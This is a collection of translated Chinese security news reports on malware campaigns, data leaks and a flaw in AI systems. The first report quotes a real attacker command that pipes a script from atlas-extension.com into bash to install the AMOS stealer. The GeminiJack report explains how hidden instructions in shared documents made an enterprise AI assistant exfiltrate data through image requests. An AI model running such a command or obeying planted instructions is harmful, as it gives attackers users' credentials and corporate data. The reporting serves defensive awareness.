HackerNews 编译，转载请注明出处： 一场新的恶意活动正通过一种新颖的攻击方式针对macOS用户，该攻击利用了ChatGPT的官方网站。 攻击者采用一种名为“ClickFix”的技术，通过在合法的chatgpt.com域名上发布虚假的安装指南来传播AMOS信息窃取木马。 此次活动利用了ChatGPT的聊天分享功能，任何用户都可以创建一个公共对话，并通过一个看似源自OpenAI官方网站的链接与他人分享。 攻击始于谷歌上的付费搜索广告。当用户搜索“chatgpt atlas”时，他们会遇到看似直接跳转到官方ChatGPT域名的赞助商链接。 谷歌搜索结果中的一个赞助商链接指向一个伪装成“macOS版ChatGPT Atlas”的恶意软件安装指南，该指南竟托管在官方ChatGPT网站上（来源：卡巴斯基） 该广告显示标题“ChatGPT™ Atlas for macOS – 下载Mac版ChatGPT Atlas”，这使其看起来完全合法。 点击这些广告的用户会被引导至一个共享的ChatGPT对话，其中包含针对不存在的Atlas浏览器的虚假安装说明。 经过深入分析，卡巴斯基安全研究人员确认，恶意行为者使用了提示词工程，迫使ChatGPT生成了一个看似可信的安装指南。 攻击者在将聊天公开之前，清除了聊天记录以移除任何可疑内容。 这个所谓的macOS版Atlas安装指南，仅仅是一个匿名用户与ChatGPT之间的共享聊天记录（来源：卡巴斯基） 该指南出现在chatgpt.com/share/子域名下，这可能会让那些未能意识到这只是一个共享对话而非OpenAI官方内容的用户，感觉其更加可信。 感染机制 虚假安装指南指示用户在Mac上打开终端应用程序，并运行一个特定命令。 恶意代码如下所示： /bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)” 此命令会从攻击者控制的服务器atlas-extension.com下载恶意脚本，并立即在受害者的计算机上执行。 脚本执行后，会提示输入系统密码，并反复询问直到输入正确密码为止。一旦密码被提供，脚本就会下载AMOS信息窃取木马，并使用窃取的凭证进行安装。 如果你询问ChatGPT是否应该遵循收到的指令，它会回答这不安全。 AMOS能够窃取Chrome和Firefox浏览器的密码、Cookie及其他浏览器数据。它还会从Electrum、Coinomi和Exodus等应用程序中窃取加密货币钱包信息。 该恶意软件会从桌面、文档和下载等文件夹中收集TXT、PDF和DOCX扩展名的文件。此外，它还会安装一个后门程序，该程序会在系统启动时自动运行，使攻击者能够持久远程访问受感染的系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 近期出现了一种新的恶意软件攻击活动，黑客通过利用合法的AI平台，直接向毫无防备的用户传播恶意代码。 攻击详情 攻击者通过谷歌搜索的赞助结果，将用户引导至伪造的ChatGPT和DeepSeek共享聊天链接。这些用户原本可能只是在搜索常见的macOS故障排除方法，例如“如何清理Mac存储空间”。 这些共享聊天看似提供了有用的系统操作指南，但实际上隐藏了用于入侵目标设备的恶意指令。 攻击始于用户接触到一条看似正规的共享对话，该对话会给出清理Mac存储空间的分步教程。 但教程中嵌有Base64编码指令，一旦执行，就会下载并运行一款复杂的多阶段恶意软件程序。 这种手法的狡猾之处在于，它绕过了AI平台通常实施的安全检查，使攻击者能够通过官方渠道直接向用户传递具有针对性的恶意指令。 感染流程始于一个bash脚本，该脚本会伪装成凭据验证弹窗，诱导用户输入系统密码。密码一旦被窃取，恶意软件便会借此提升权限，并从攻击者控制的服务器下载主恶意程序二进制文件。 Breakpoint Security的安全分析师将此样本识别为Shamus——一种已知的信息窃取和加密货币盗窃程序，已在安全社区中被广泛记录。 复杂策略 该恶意软件的复杂性体现在其多层编码和检测规避策略上。它结合算术编码、XOR编码和定制的6位解码器，以隐藏恶意代码，从而避免被分析工具发现。这种混淆手段使得安全研究人员仅通过静态分析极难识别其真实功能。 一旦安装成功，恶意软件会通过创建在系统启动时自动运行的LaunchDaemon，实现持久化系统访问。这确保了即使用户重启计算机，恶意软件仍能保持访问权限。其核心功能针对多类敏感数据，包括从Chrome、Firefox以及其他12款基于Chromium的浏览器中窃取Cookie和密码。 威胁还延伸至加密货币钱包，该恶意软件专门针对15种不同的桌面和硬件钱包应用程序，包括Ledger Live、Trezor Suite、Exodus、Coinomi、Electrum和Bitcoin Core等。此外，它还会窃取整个macOS钥匙串数据库、Telegram会话数据、VPN配置文件以及桌面和Documents文件夹中的文件。 在数据收集完成后，所有窃取的信息会被压缩，并通过加密通信传输到攻击者的命令与控制服务器。 这一攻击活动代表了恶意软件传播方式的复杂进化，展示了威胁行为者如何不断寻找新方法来绕过安全防护措施，入侵用户系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 根据Huntress公司的新发现，React2Shell漏洞正持续遭遇大规模利用，威胁行为者利用React服务器组件中一个严重程度最高的安全漏洞，来投递加密货币挖矿程序及一系列此前未被记录的恶意软件家族。 这些新型恶意软件包括一款名为PeerBlight的Linux后门、一个名为CowTunnel的反向代理隧道工具，以及一个被称为ZinFoq的基于Go语言的攻陷后植入程序。 Huntress表示，已检测到攻击者通过CVE-2025-55182漏洞针对众多组织进行攻击。此漏洞是RSC组件中的严重安全缺陷，攻击者可利用该漏洞实现未授权远程代码执行。截至2025年12月8日，攻击已覆盖多个行业，其中建筑业和娱乐业成为主要受害领域。 Huntress首次记录到针对Windows终端的利用尝试可追溯到2025年12月4日。当时，一个未知威胁行为者利用了存在漏洞的Next.js实例来投递一个shell脚本，随后通过命令下载加密货币挖矿程序和Linux后门。 在另外两起事件中，攻击者执行了信息探测命令，并试图从C2服务器下载多个恶意载荷。部分典型入侵事件还专门针对 Linux 主机投放了门罗币加密货币挖矿程序，此外攻击者还会先利用一款公开的GitHub工具定位存在漏洞的 Next.js 实例，再发起攻击。 Huntress研究员指出：“基于在多个终端观察到的持续攻击模式，包括完全相同的漏洞探测、shell代码测试和C2基础设施，我们评估该威胁行为者很可能在利用自动化的漏洞利用工具”，“攻击者向 Windows 终端尝试部署 Linux 专属恶意载荷的行为，进一步佐证了该自动化工具未对目标操作系统进行区分”。 攻击中投放的主要恶意载荷说明 sex.sh：一款bash脚本，可直接从GitHub获取XMRig 6.24.0矿机程序 PeerBlight：Linux后门程序，与2021年出现的RotaJakiro 和Pink两款恶意软件存在部分代码重合；它会创建systemd 服务实现持久化驻留，并伪装成“ksoftirqd”守护进程以躲避检测 CowTunnel：反向代理工具，可主动与攻击者控制的快速反向代理服务器建立出站连接，以此绕过仅监控入站连接的防火墙 ZinFoq：Linux平台ELF格式二进制文件，集成了一套后期渗透框架，具备交互式shell、文件操作、网络跳板、时间戳篡改等功能 d5.sh：投放Sliver C2框架的加载器脚本 fn22.sh：d5.sh的变种，新增了自更新机制，可获取恶意软件新版本并重启运行 wocaosinm.sh：Kaiji DDoS 恶意软件的变种，整合了远程管理、持久化和反检测能力 PeerBlight支持与硬编码的C2服务器建立通信的能力，允许其上传/下载/删除文件、生成反向shell、修改文件权限、运行任意二进制文件以及自我更新。该后门还利用了域名生成算法和BitTorrent分布式哈希表网络作为备用的C2机制。 研究人员解释道：“后门接入DHT网络后，会以固定前缀LOLlolLOL注册节点ID。这9字节的前缀是该僵尸网络的标识，而20字节DHT节点ID的剩余11字节则为随机生成。” Huntress表示，已识别出了超过60个带有LOLlolLOL前缀的唯一节点，同时指出受感染僵尸主机需满足多项条件，才会向其他节点共享自身 C2 配置：需具备有效客户端版本、响应节点需存有可用配置、且需匹配正确的事务 ID。 即便满足所有必要条件，这类僵尸主机也仅会在约三分之一的情况下通过随机校验共享配置，此举或为降低网络流量特征、规避检测。 ZinFoq植入程序同样会向其C2服务器发送心跳信号，并可解析接收的指令，执行以下操作：通过 “/bin/bash” 运行命令、枚举目录、读取或删除文件、从指定 URL 下载更多恶意载荷、窃取文件及系统信息、启动 / 停止 SOCKS5 代理、开启 / 关闭 TCP 端口转发、篡改文件访问和修改时间、建立反向伪终端（PTY）shell连接。 此外，ZinFoq还会清除bash历史记录，并将自身伪装成 44种合法Linux系统服务之一，以此隐藏自身踪迹。 Huntres提醒，鉴于该漏洞 “易被利用且危害等级极高”，所有使用 react-server-dom-webpack、react-server-dom-parcel 或 react-server-dom-turbopack 组件的组织应立即完成版本更新。 此消息发布之际，Shadowserver基金会表示，在优化扫描目标策略后，截至 2025 年 12 月 8 日，已检测到超 16.5 万个存在漏洞代码的 IP 地址和 64.4 万个相关域名。其中美国境内的漏洞实例数量超 9.92 万个，其后依次为德国（1.41 万个）、法国（6400 个）和印度（4500 个）。 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 谷歌 Gemini 企业级 AI 生态系统中一个新发现的提示词注入漏洞已被修复，该漏洞曾允许攻击者窃取敏感的 Gmail 邮件、文档及日历数据，但专家表示，这只是 AI 漏洞时代的开端。 “GeminiJack” 漏洞存在于谷歌 Gemini Enterprise（此前也存在于 Vertex AI Search）中，由诺玛实验室（Noma Labs）的研究人员于今年 5 月发现，在与谷歌合作完成修复后，该漏洞已于本周二被公开披露。 攻击者利用企业对谷歌 Workspace 工具及共享功能的依赖，能够操纵日常工作流程，进而访问并窃取企业敏感信息。 诺玛实验室指出：“一份共享的谷歌文档、一则谷歌日历邀请，甚至一封 Gmail 邮件，都能瞬间成为侵入企业数据的持续性开放通道。” 更关键的是，诺玛实验室称，与传统软件漏洞不同，GeminiJack 并非常规缺陷，而是谷歌企业级 AI 系统在解读用户提供内容时存在的架构性弱点。 同时，由于该漏洞无需用户任何操作即可造成危害，它也被视为迄今企业级云环境中遭遇的最严重 AI 驱动型安全风险之一。 诺玛实验室在其安全博客中解释：“目标员工无需进行任何点击，不会出现任何警示信号，也不会触发任何传统安全工具。” DryRun Security 首席执行官詹姆斯・威克特（James Wickett）表示：“GeminiJack 这类事件表明，提示词注入和数据泄露已不再是边缘性研究课题，这些漏洞是企业（即便是大型科技公司）将大语言模型接入系统时，深层架构问题的外在表现。” 漏洞攻击原理 诺玛实验室研究人员称，攻击者可在共享文档或消息中嵌入隐藏指令。 当员工后续使用谷歌 Gemini Enterprise AI 执行常规搜索时，AI 助手会自动检索被篡改的内容、执行恶意指令，并通过伪装的外部图片请求，轻松将敏感数据外传。 借助 GeminiJack 零点击漏洞，单次常规 AI 查询就可能泄露以下信息： 数年的内部邮件，包括客户沟通及财务往来信息 完整的日历历史，可泄露商务谈判、合作关系及企业组织运作情况 全部文档库，涵盖合同文件至技术架构方案等各类资料 谷歌方面表示 “已对漏洞披露做出迅速响应”，其团队与诺玛实验室协作 “厘清了攻击路径并实施了全面的缓解措施”。 诺玛实验室称，此次修复解决了检索增强生成（RAG）处理管道中指令与内容混淆的核心问题。 据英伟达定义，检索增强生成（RAG）是一套循环式处理流程，可实时完成文档预处理、数据摄入及嵌入向量生成，将用户查询转化为易于理解的信息，同时最大限度降低模型 “幻觉” 现象。 而所有窃取的数据，都会通过看似正常的图片请求直接流向攻击者，这类请求与合法流量难以区分。 诺玛实验室研究人员评价道：“这是 AI 过度自主权限的典型体现。AI 助手完全按设计逻辑运行，却沦为了可想象到的最高效企业间谍工具。” 谷歌指出，作为修复措施的一部分，Vertex AI Search 现已与 Gemini Enterprise 完全分离，确保二者不再共用同一大语言模型驱动的检索管道。 对于未来的 AI 注入攻击，威克特指出 “我们仍处于 AI 应用初期阶段”。 他认为，在团队为模型输入、检索来源及智能体操作建立起真正的防护屏障前，未来几年内类似 GeminiJack 的故障还会不断出现。 威克特表示：“若缺乏此类管控且不重视构建安全的 AI 应用，这类安全事件大概率会愈发频繁。”     消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 俄罗斯媒体The Bell发布了一篇深度报道，揭秘今年 7 月俄罗斯国家航空公司俄罗斯国际航空公司（俄航，Aeroflot）遭遇的重大黑客攻击事件，证实该公司当时整个基础设施曾濒临崩溃边缘。 早在 7 月，两个亲乌黑客组织 ——“沉默乌鸦（Silent Crow）” 和 “白俄罗斯网络游击队（Belarusian Cyber-Partisans）” 就已宣称对这起针对俄航的攻击负责。 黑客们不仅瘫痪了 7000 台服务器、窃取了乘客及员工数据，还控制了包括高管在内的员工个人电脑。他们透露，此次行动是一场耗时一年的俄航网络渗透计划。 不过，当时现场的实际情况究竟如何？据The Bell报道，与其他多起规模较小的同类攻击不同，俄航遇袭事件根本无法被俄罗斯官方掩盖：数百架航班延误或取消，数千名乘客滞留于大大小小的机场。 尽管如此，俄航仍试图隐瞒。The Bell指出，该航空公司甚至未告知内部员工公司正遭受黑客攻击，反而将事件定性为 “信息系统故障”。但事实上，攻击者当时已险些摧毁其全部基础设施。 紧急切断全楼电源 这场攻击始于 7 月 28 日凌晨 5 时，彼时俄航技术支持群内开始上报紧急情况：系统瘫痪、电脑反复重启且无法恢复。 两小时后，在确认黑客正实时擦除员工办公电脑数据后，俄航下达了 “全面停机” 的指令。 《The Bell》的消息源透露，当时切断总部所有楼层的电源，是阻止攻击者彻底摧毁公司全部网络基础设施的唯一办法。 这是因为，正如黑客后续所言，且有匿名俄航官员向《The Bell》证实的那样，他们已获取了航空公司整个企业网络的管理员权限。 随后，攻击者在俄航企业网络中推送了一项组策略，触发了工作站的定时数据擦除程序。局势一度濒临全面失控 —— 不过俄航团队的应对其实十分迅速。 一位接近仍在进行中的调查的消息人士解释道：“他们切断了与俄罗斯电信公司（Rostelecom）的通信，中断了与机票数据库的连接，还断开了和谢列梅捷沃机场的链路，以至于工作人员只能靠 Excel 表格重建所有数据，在大幅纸上重新绘制全部航线。” “这无疑对公司声誉造成了损害。但如果当时没有如此迅速地行动，公司的基础设施恐怕会荡然无存。” 事发当天，俄航共取消 108 架次航班，仅在其枢纽机场谢列梅捷沃机场，就有超 80 架次航班延误。该航空公司称，此次航班取消造成的损失至少达 2.6 亿卢布（约合 334 万美元）—— 但这个数字其实并不算多。 薄弱环节：合作承包商 尽管直接经济损失有限，此次攻击造成的整体危害却极大。《The Bell》指出，被窃取的数据中，“非商业航班” 相关信息或为最敏感的内容。 原因在于，攻击发生后，黑客公布了一份由俄国防部代表签署的文件，文件中国防部要求将其设备接入俄航内部网络，以 “高效规划军事空运任务”。 一位俄航消息人士指出：“这对俄航是沉重一击。该公司一直将自身定位为纯民用航空公司，过去几年也一直在刻意与战事保持距离，而这份文件却将一切白纸黑字地摆到了台面上。” 该人士认为，这或许正是此次网络攻击的核心目的。 此次攻击的初始入口，似乎是一家名为巴卡软件（Bakka Soft）的小型 IT 公司。该公司负责为俄航开发移动及网页应用，且在攻击发生前一个月，还刚宣布推出了俄航新版 iOS 网页应用。 《The Bell》称，早在 2025 年 1 月，也就是攻击发生前 6 个月，为俄航提供技术支持的 IT 专家就已在俄航及巴卡软件的网络中监测到了可疑活动。 巴卡软件从未公开披露其系统遭黑客入侵的消息，但种种迹象表明入侵确实发生过。 白俄罗斯网络游击队的代表尤利娅娜・舍梅托维茨（Yuliana Shemetovets）指出，俄航管理层使用的是简单且极易被破解的密码。 网络安全专家虽已将入侵者逐出俄航系统，但消息人士称，他们并未彻底清理巴卡软件的基础设施，这使得攻击者得以着手筹备后续的网络攻击。 《The Bell》的一位消息人士惋惜道：“这类事件中，承包商往往是薄弱环节：他们难以及时取得联系、会抗拒配合调查、不允许访问其基础设施，而且基础设施的清理工作也做得一塌糊涂。” 该媒体还联系到白俄罗斯网络游击队代表尤利娅娜・舍梅托维茨，她也指出俄航管理层存在使用简易密码的问题。   消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 企业使用海量联系人数据库虽能大幅节省时间，却存在重大安全隐患。若数据库未加防护，单一数据集的泄露就可能危及数百万用户隐私，而这正是 Cybernews 研究团队近期发现的一起重大数据泄露事件的真实写照。 研究团队发现了一个未设防护的 MongoDB 数据库实例，其中存储的职业与企业情报数据高达 16.14 太字节，总计近 43 亿份文档，堪称迄今泄露规模最大的销售线索数据集之一。 这一重大发现由 Cybernews 撰稿人、网络安全研究员、SecurityDiscovery.com网站所有者鲍勃・迪亚琴科（Bob Diachenko）完成。他于 2025 年 11 月 23 日发现该 43 亿条量级的数据库，两天后数据库所有者才对其完成安全加固。 目前研究人员尚不清楚该数据库在被发现前已暴露多久，但既然团队能找到，不法分子也极有可能早已察觉。这类信息详实、分类规整的大型数据集是攻击者的 “宝藏”，可被用于发动大规模自动化攻击。 海量数据集包含哪些内容？ 43 亿条泄露记录均存储于 MongoDB 数据库中，该数据库常被企业用于存储和处理大规模数据。此次泄露大概率源于人为失误 —— 数据库因未配置适当身份验证而处于暴露状态。 据研究团队介绍，这个超 16 太字节的数据库结构完整，数据应为爬取所得的职业及企业情报，其中包含大量来自领英的详细个人资料、联系方式、企业关联关系及职业经历等信息。 数据集内共发现 9 个数据集合，其命名基本可体现所含信息类型，且各数据集的体量与记录内容差异显著： intent：20.54410607 亿条文档（604.76GB） profiles：11.35462992 亿条文档（5.85TB） unique_profiles：7.32412172 亿条文档（5.63TB） people：1.69061357 亿条文档（3.95TB） sitemap：1.63765524 亿条文档（20.22GB） companies：1730.2088 万条文档（72.9GB） company_sitemap：1730.1617 万条文档（3.76GB） address_cache：812.6667 万条文档（26.78GB） intent_archive：207.3723 万条文档（620MB） 研究人员确认，单个数据集合内的记录均为唯一，但不同数据集合间可能存在重复数据。其中至少 profiles、unique_profiles 和 people 三个集合包含个人身份信息（PII），这三个集合合计近 20 亿条记录，泄露的具体信息包括： 全名 邮箱与电话号码 领英网址及个人主页账号 职位名称、雇主及职业经历 教育背景、学位与证书 地理位置数据 掌握语言、技能及职能 社交媒体账号 图片网址（unique_profiles 集合） 邮箱可信度评分（people 集合） “阿波罗 ID（Apollo ID）” 如此庞大的数据库给所有相关方带来严重隐私隐患。从数据库结构来看，其数据应为领英风格的爬取所得，这意味着邮箱、手机号、岗位及社交关系等大部分数据都具备较高时效性与准确性。此外，unique_profiles 集合含 7.32 亿多条记录，且包含个人照片；people 集合则存有邮箱验证信息、信息完善度评分及社交账号，这类评分常被营销、销售及招聘人员用于评估销售线索或候选人的匹配度。 这批领英相关数据的采集时间难以精准判定，数据库 “更新时间” 戳显示信息于 2025 年完成采集或更新，但 2021 年曾有威胁攻击者宣称爬取了数亿条领英记录，因此该 MongoDB 数据库或包含历史爬取数据。 研究人员还发现，数据库中个人资料、联系人及职业经历的字段格式统一，sitemap 和 company_sitemap 集合含 1.8 亿条记录，可实现网址与个人资料 ID 的关联。团队认为，如此庞大的泄露规模，足以证明数据来源于自动化爬取和信息完善流程。 尽管 “阿波罗 ID” 的具体含义尚不明确，但数据集特征强烈指向其信息源自销售情报工具 Apollo.io。“阿波罗 ID” 的存在打通了领英与 Apollo 两大销售线索生态，形成了一套可用于监控级别的整合数据集。 谁是泄露数据集的所有者？ 截至发稿，数据集归属尚未得到确认，但已有部分线索指向潜在所有者。研究团队发现，数据库中的站点地图集合将 “/people” 和 “/company” 链接指向某销售线索生成公司官网。 该公司主营企业获客服务，可提供大规模 B2B 销售线索数据库，其数据类型与泄露数据库高度吻合。官网宣称服务超 7 亿职场人士，这一数字与 unique_profiles 集合的记录量相近；且在研究人员就潜在数据泄露问题通知该公司后，暴露的数据库次日便被关闭。 研究人员解释：“此类大型数据集是恶意攻击者的首要目标，可作为结合其他数据泄露事件开展信息补全的核心基础，助力攻击者构建可检索的大规模个人信息库，补全后的数据还可能包含密码、设备标识、其他社交账号等信息。” 不过团队暂不直接将泄露归咎于该公司，也存在该公司数据库被数据集实际所有者爬取的可能性。目前 Cybernews 已联系该公司寻求置评，如有回复将更新报道。 此次泄露的危害何在？ 网络犯罪分子可利用这类未防护大型数据库谋取巨额利益。例如，攻击者可借助数据发起定向钓鱼攻击，筛选出企业 CEO 实施 “冒充老板诈骗”，即伪造高管身份诱骗员工转账；也可用于企业情报侦察，就像安全人员会利用员工信息测试企业社会工程学防御一样，攻击者也能借此寻找漏洞、渗透企业系统。 大型企业数据在暗网极具价值，而该数据集中必然包含财富 500 强企业员工信息，攻击者可据此锁定特定目标企业。即便没有这类专属数据库，攻击者也能发起此类攻击，但现成数据集能大幅提升成功率、缩短筹备时间。 此外，攻击者还可利用数据集开展自动化攻击。如今网络犯罪团伙同样热衷 AI 辅助攻击，43 亿条量级的数据集恰好适配这类操作 —— 大语言模型（LLM）可基于用户资料生成个性化恶意邮件，只需稍加操作就能群发数千万封，而只要命中一个高价值目标，整个攻击行动便可获利。 研究人员补充道：“此类大型数据集是恶意攻击者的重点目标，可作为信息补全的核心基础，结合其他泄露数据构建可检索的个人信息库，补全后还可能包含密码、设备标识等信息，大幅降低社会工程学攻击和凭证填充攻击的实施门槛。” 数十亿条记录泄露已成常态 近年来，数十亿条记录级别的重大数据泄露事件已屡见不鲜： 2025 年 6 月，Cybernews 曾报道一起疑似中国地区史上最大规模数据泄露事件，涉及数十亿份文档，含金融数据、微信及支付宝信息等敏感个人信息 2024 年夏，名为 RockYou2024 的迄今最大密码集合（含近 100 亿个唯一密码）在知名黑客论坛泄露；2021 年也曾出现过超 80 亿条记录的同类密码集合泄露 2024 年初，Cybernews 研究团队发现了迄今仍保持规模之最的 “终极数据泄露（MOAB）” 事件，涉及 260 亿条记录 职业及企业信息类大规模泄露也早有先例： 2018 年，Apollo.io 曾因数据库未防护导致数十亿条记录泄露，含 1.25 亿个唯一邮箱 2019 年，美国数据经纪商 People Data Labs 发生数据泄露，波及 6.22 亿人；2024 年 Cybernews 研究人员又发现其一个未防护数据库泄露 1.7 亿多条敏感记录 与此同时，领英一直在严厉打击平台个人资料爬取行为。2025 年 10 月初，领英对软件公司 ProAPIs 及其 CEO 提起诉讼，指控该公司通过创建数十万个虚假账号非法爬取数百万条领英用户资料 领英表示，其用户协议禁止通过自动化机器人爬取数据，也严禁伪造身份或创建虚假账号，强调爬取行为会对用户安全构成威胁。领英在诉状中指出：“一旦数据被爬取，领英及用户均无法阻止被告及其客户将数据用于群发垃圾邮件、出售给诈骗分子，或与其他数据整合形成大型私密数据库等行为。” 消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 据观察，组织松散的支持俄罗斯的黑客行动团体一直在利用暴露的虚拟网络计算连接，入侵多个行业的运营技术系统。 根据美国网络安全和基础设施安全局（CISA）、联邦调查局（FBI）、国家安全局（NSA）及其他国内外合作伙伴发布的一份新报告，这些攻击是近期一波技术含量低但具有破坏性的入侵活动的一部分，影响了美国水处理、食品生产和能源领域的实体。 报告撰写机构指出，“俄罗斯重生网络军”（CARR）、”Z-Pentest”、”NoName057(16)”以及”Sector16″等组织正在使用简单的侦察工具和常见的密码猜测技术，来访问面向互联网的人机界面。 尽管他们的活动水平不如国家支持的威胁组织先进，但在某些情况下已导致实际影响。 CISA表示，这些黑客行动分子通常追求的是曝光度而非战略优势，经常夸大他们在网上公开的事件规模。 即便如此，在攻击者篡改参数、禁用警报或重启设备后，运营商仍面临暂时的监控失灵以及代价高昂的手动恢复工作。 该报告概述了自2022年以来，几个亲俄黑客团体如何扩张，其中一些还得到了与俄罗斯国家有关联组织的间接或直接支持。 CARR和NoName057(16)在2024年组建Z-Pentest之前曾广泛合作，而Sector16则在2025年初通过类似联盟出现。每个团体都依赖广泛可用的工具来扫描端口、暴力破解弱密码、录制被入侵系统的屏幕截图，并在网上传播。 给运营商的建议措施 报告强调，工业和运营技术的所有者应加强系统暴露面管理和认证措施。建议的措施包括： 减少运营技术资产对公共互联网的访问 采用更强的资产管理，例如映射数据流 使用强身份验证，在可能的情况下包括多因素身份验证 报告还强调了网络分段、严格的防火墙策略、软件更新以及允许在系统受损时快速手动操作的应急计划的重要性。 报告警告称，发现存在弱凭证的暴露系统的组织应假定已遭入侵，并立即启动事件响应。 尽管这些攻击仍然相对简单，但报告撰写机构警告称，持续的活动可能会导致更严重的后果。 “本报告中强调的亲俄黑客行动团体已表现出对脆弱系统造成实际损害的意图和能力，” CISA网络安全执行助理局长尼克·安德森警告说。 “除了实施建议的缓解措施并严格验证其安全控制外，我们呼吁所有运营技术设备制造商优先考虑安全设计原则——因为从一开始就构建安全性对于降低风险和保护国家最重要的系统至关重要。” 消息来源：infosecurity-magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 微软恶意软件 一些开发者以为自己安装的是VS Code的深色主题和AI助手。然而，那实际上是窃取其数据的恶意软件。 网络安全公司Koi的研究人员发现了微软Visual Studio Code（VS Code）的新恶意扩展。这两个扩展都是在微软官方市场（Microsoft Marketplace）上发现的，开发者可以在此处为这款流行工具下载扩展。 该恶意软件伪装成受比特币设计启发的高级深色主题和AI编程助手扩展，用信息窃取型恶意软件感染了开发者的设备。这两个扩展都会分发捆绑了恶意DLL文件（“Lightshot.dll”）的Lightshot截图工具。 该恶意软件会窃取剪贴板内容、已安装程序列表、运行进程、桌面截图、存储的Wi-Fi凭据以及详细的系统信息。 它还会以无头模式启动Google Chrome和微软Edge浏览器，窃取存储的浏览Cookie，并可能劫持用户会话。 VS Code恶意软件 “你的代码、你的电子邮件、你的Slack私信。只要你屏幕上的内容，他们都能看到。”Koi Security的研究人员写道。 “它还会窃取你的Wi-Fi密码、读取你的剪贴板，并劫持你的浏览器会话。” 研究人员提醒我们，VS Code主题是JSON文件，它们不需要激活事件、主要入口点或执行PowerShell脚本。这个恶意主题引起了怀疑，因为它会在每次VS Code操作时运行。 作为恶意的AI助手，它确实提供了实际功能，用户可以直接在VS Code中与ChatGPT或DeepSeek聊天机器人对话。这使其看起来更加可信。 然而，在代码内部，就在合法的AI聊天实现之前，研究人员发现了交织其中的恶意代码。攻击者留下了标记他们自己代码中恶意部分的注释。 “这告诉我们一些关于他们的工作流程——他们正在积极维护这个代码库，并希望确保自己或合作者在更新过程中不会意外删除有效载荷交付机制。”研究人员解释道。 恶意扩展名称： BigBlack.bitcoin-black BigBlack.codo-ai BigBlack.mrbigblacktheme 微软已于12月5日和12月8日将这些恶意软件从市场中移除。 虽然前两个恶意扩展已被用户下载，但Koi研究人员告诉The Hacker News，BigBlack.mrbigblacktheme扩展没有造成实际影响，因为它被非常快速地移除了。   消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 巴德尔航空公司数据泄露事件 一名黑客声称已入侵苏丹为数不多仍在运营的航空公司之一，并将其内部手册及安全数据泄露至网络犯罪交易平台。 苏丹一家主要航空公司疑似遭遇网络攻击。近期，一名攻击者在某网络犯罪论坛发帖，宣称掌握了巴德尔航空公司 2.21GB 的数据，其中包含受管控的内部文件。 据该黑客声称，这批文件的时间范围为今年 6 月至 7 月，其正以加密货币为支付方式兜售这批数据。 据称，被泄露的数据包含以下内容： 飞行调度手册 超 1400 页的资料，详细说明运营政策、飞行员培训体系及波音 737 机型技术规程 公司安全项目手册，内含航空公司安全架构及威胁响应协议的敏感信息 安全管理体系手册，明确了航司的安全治理架构、组织体系及管理层监督职责 最低设备清单，包含机队层面数据，完整标注了飞机注册号及序列号 地面服务与标准作业程序手册，涵盖波音 737 机型运营及地面服务流程的标准操作规范 站点人员信息，包括卢旺达基加利站点的完整联系方式，含站点经理姓名、电子邮箱及电话号码 为佐证其说法，攻击者还附上了飞行调度手册的截图作为数据样本。不过，其是否真的持有其他敏感文件，目前尚无法证实。 “若该黑客的说法属实，且其确实掌握了其余文件，那么社会工程学攻击的频次可能会上升，而运营规程的泄露也可能暴露内部工作流程，进而被用于敲诈勒索。”Cybernews 研究团队解释道。 Cybernews 已就此事件联系巴德尔航空公司寻求置评，但截至目前尚未收到回复。巴德尔航空公司是一家总部位于苏丹首都喀土穆的私营航司，主营常规运输服务及人道主义援助运输业务。 尽管战乱导致苏丹大部分民用航空基础设施几近瘫痪，巴德尔航空仍是少数坚持运营的民用航班运营商之一。 该航司成立于 2004 年，提供国内及地区性客运、货运和贵宾包机服务，航线连接苏丹与中东及非洲多国，年营收达 5600 万美元。 航空业的多事之秋 今年全球航空业风波不断，已遭遇多起重大网络攻击。就在上月，一个与俄罗斯相关的勒索软件团伙 ——verest Ransomware，对西班牙国家航空（伊比利亚航空）发起了攻击。 该团伙称，窃取的数据包含客户姓名、联系方式、出生日期、出行及预订信息、脱敏银行卡数据和营销档案。此外，其还宣称已 “长期不受限制地访问” 所有航班预订系统，具备查看和修改预订信息的能力。 西班牙国家航空已证实该攻击事件，并向所有受影响客户推送了相关通知，但同时淡化了此次攻击造成的影响。 另一家航空业巨头柯林斯宇航也遭此团伙攻击，导致欧洲多座机场系统陷入瘫痪。该公司旗下的 MUSE 值机软件（欧洲多家大型机场均使用此软件管理值机和登机系统）同样成为 “珠穆朗玛峰勒索软件” 的攻击目标。 最终，该团伙在暗网上泄露了据称属于柯林斯宇航的 23GB 数据。   消息来源：cybernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

